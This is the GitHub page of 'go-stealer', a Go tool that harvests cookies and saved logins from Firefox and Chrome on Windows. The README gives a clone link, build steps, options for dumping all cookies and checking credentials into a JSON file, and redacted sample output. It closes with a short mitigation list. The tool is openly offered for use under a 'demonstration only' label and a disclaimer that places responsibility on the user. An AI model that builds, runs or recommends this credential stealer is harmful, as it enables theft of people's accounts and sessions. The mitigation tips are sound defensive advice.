Skip to content
/ go-stealer Public

Cookie & Logins stealer for Firefox + Chrome, demonstration only

11 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

idfp/go-stealer

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
.gitignore
.gitignore
 
 
README.md
README.md
 
 
chrome.go
chrome.go
 
 
firefox.go
firefox.go
 
 
firepwd.go
firepwd.go
 
 
firepwd_test.go
firepwd_test.go
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

Golang Credential Stealer

Demonstration of gaining access into cookies & login credentials. Currently only supports firefox & chrome, planning to support edge but i have no interest in any other browser since the main purpose of this repo is just as demonstration.

Special thanks to @lclevy for their implementation of credential decrypting, all algorithms I use for decrypting firefox login credentials are just replica of Firepwd. I just rewrite it completely in go.

Please note that any illegal action related to this program is highly discouraged, it is user's resposibility for anything done with this distribution and has nothing to do with me.

Currently only windows is supported, and older version of firefox / chrome might be incompatible (this is intentional since most people don't use older browser anyway).

Building

Install go compiler, > 1.18 if possible, but any version above 1.0 seems fine.

> go version
go version go1.18 windows/amd64

Clone this repository.

git clone https://github.com/idfp/go-stealer

Install required dependencies, then build it or just run as it is.

go build .

Usage

go-stealer.exe [Options]
or
go run . [Options]

There's no need to pass profile directory, the program will find it by its own.

Options

--browser               Targeted browser, by default the value is "firefox".
-b                      Shorthand for --browser.

--check-credentials     Check login credentials, by default this is turned off.
-c                      Shorthand for --check-credentials.

--dump-all              Dump all cookies instead of just a specific host, --output is required for this.
-a                      Shorthand for --dump-all

--output                JSON File to save all logged credentials.
-o                      You guessed it.

--web                   Specific host to look for when doing cookies logging.
-w                      Yes

Example Usage

This is how the result will looks like, of course the private data is censored.

> go-stealer.exe -a -c -o result.json
Opening SQL File
accounts.google.com @ SMSV : [REDACTED]
.developers.google.com @ _ga : [REDACTED]
accounts.google.com @ ACCOUNT_CHOOSER : [REDACTED]
.google.com @ ANID : [REDACTED]
.fonts.google.com @ _ga : [REDACTED]

...

Site: https://id.heroku.com 
Username: ri******@gmail.com
Password: ******

Site: https://discord.com 
Username: ri******@gmail.com
Password: ******

Saving all result to result.json

Mitigation

To prevent yourself from being a victim of this attack, here's some tips for you:

  1. Prevent initial access to your device, this includes but not limited to: executing random exe file, opening suspicious office documents, or visiting random websites.
  2. Activate 2FA whenever it's possible.
  3. Use firefox master password, this will prevent credential stealing in firefox. Tt is bruteforcable so make the password carefully, well they still will be able to steal your cookies and chrome credentials anyway. master password
  4. Do not save any login credential on your browser, just either remember it or use local password manager.

About

Cookie & Logins stealer for Firefox + Chrome, demonstration only

Topics

go demonstration red-team cookie-grabber

Resources

Readme
Activity

Stars

11 stars

Watchers

2 watching

Forks

3 forks
Report repository

Languages